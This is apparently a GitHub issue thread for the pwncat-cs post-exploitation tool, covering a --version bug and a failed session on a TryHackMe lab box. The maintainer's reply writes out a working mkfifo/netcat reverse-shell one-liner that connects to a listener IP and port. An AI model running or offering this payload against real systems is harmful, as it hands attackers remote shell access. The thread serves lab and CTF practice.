Closed diegoxcn closed 2 years ago
The error you get when running --version
is a known bug but shouldn't affect the functionality. It just affects using --version
. I will push a fix for that in the next day or so.
Regarding the failed session, you aren't connecting standard output of the shell to the socket. You are connecting pwncat
to the standard input of /bin/bash
, but standard output is going to the terminal where you ran the nc
command. pwncat
needs to be able to see the output of the shell.
Long-story-short, you need to change your payload. https://www.revshells.com/ is a great resource for reverse and bind shell payloads. If you don't have the -e
option for netcat, then you can select nc mkfifo
from the list on the left, and bash
for the shell, and then you should get a payload something like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.122.1 4444 >/tmp/f
Obviously, change the IP address and port number to your liking.
This has been fixed, and is now pushed to PyPI.
Hi, I'm new to this tool. But after installation it seems like failed to capture active session, and give this error message when I try to check the version of I installed.
Bug Description
pwncat version
I installed pwncat-cs by pip
Target System (aka "victim")
Tryhackme madness Haven't tried on others yet.
Steps to Reproduce
Steps to reproduce the behavior: On victim box: 1.nc 9001 | /bin/sh
On attack box:
1.
Expected Behavior
version can show correct infomation; session can be captured.
Screenshots
If applicable, add screenshots to help explain your problem.